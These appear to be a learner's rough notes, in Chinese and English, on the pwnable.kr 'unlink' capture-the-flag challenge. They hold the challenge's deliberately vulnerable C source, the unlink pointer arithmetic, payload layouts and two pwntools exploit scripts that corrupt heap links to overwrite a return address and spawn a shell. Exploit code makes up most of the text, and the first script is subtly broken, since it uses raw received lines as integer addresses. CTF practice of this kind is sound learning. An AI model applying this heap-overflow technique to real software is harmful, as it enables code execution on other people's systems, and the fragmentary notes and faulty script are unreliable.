FD=P->fd = target addr -12
BK=P->bk = expect value
FD->bk = BK，即 *(target addr-12+12)=BK=expect value
BK->fd = FD，即 *(expect value +8) = FD = target addr-12

堆块的链接顺序是从大到小还是??

Pwnable

gcc -Wl,-rpath=/home/ubuntu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64//,–dynamic-linker=/home/ubuntu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-linux-x86-64.so.2 1.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct tagOBJ{
	struct tagOBJ* fd;
	struct tagOBJ* bk;
	char buf[8];
}OBJ;

void shell(){
	system("/bin/sh");
}

void unlink(OBJ* P){
	OBJ* BK;
	OBJ* FD;
	BK=P->bk;
	FD=P->fd;
	FD->bk=BK;
	BK->fd=FD;
}
int main(int argc, char* argv[]){
	malloc(1024);
	OBJ* A = (OBJ*)malloc(sizeof(OBJ));
	OBJ* B = (OBJ*)malloc(sizeof(OBJ));
	OBJ* C = (OBJ*)malloc(sizeof(OBJ));

	// double linked list: A <-> B <-> C
	A->fd = B;
	B->bk = A;
	B->fd = C;
	C->bk = B;

	printf("here is stack address leak: %p\n", &A);
	printf("here is heap address leak: %p\n", A);
	printf("now that you have leaks, get shell!\n");
	// heap overflow!
	gets(A->buf);

	// exploit this unlink!
	unlink(B);
	return 0;
}

1
2
3

"A"*16 + (heap_addr+0x20+0x4) + (stack_addr+0x10) + (shell_addr)
"A"*16 +  (target addr -12)  + ( expect value:ebp -x04)    + (shell_addr)

这个是要把堆中地址

接收到stack地址,修改返回地址?

exp

from pwn import *

sh = process("./unlink")
ELF=ELF("./unlink")

stack = sh.recvline().strip()
heap = sh.recvline().strip()


payload = p32(ELF.symbols['shell']) + b"a"*12	 + p32(heap+0xc) + p32(stack+0x10) 
sh.send(payload)
sh.interactive()



from pwn import *


#pwn_ssh = ssh(host='pwnable.kr',user='unlink',password='guest',port=2222)
p = process("/home/unlink/unlink")
line1=p.readline().strip()
line2=p.readline().strip()
stack_addr = int(line1.split(': 0x')[1], 16)
heap_addr = int(line2.split(': 0x')[1], 16)
shell_addr = 0x080484eb

p.sendline('A'*16 + p32(heap_addr+0x24) + p32(stack_addr+0x10) + p32(shell_addr))
p.interactive()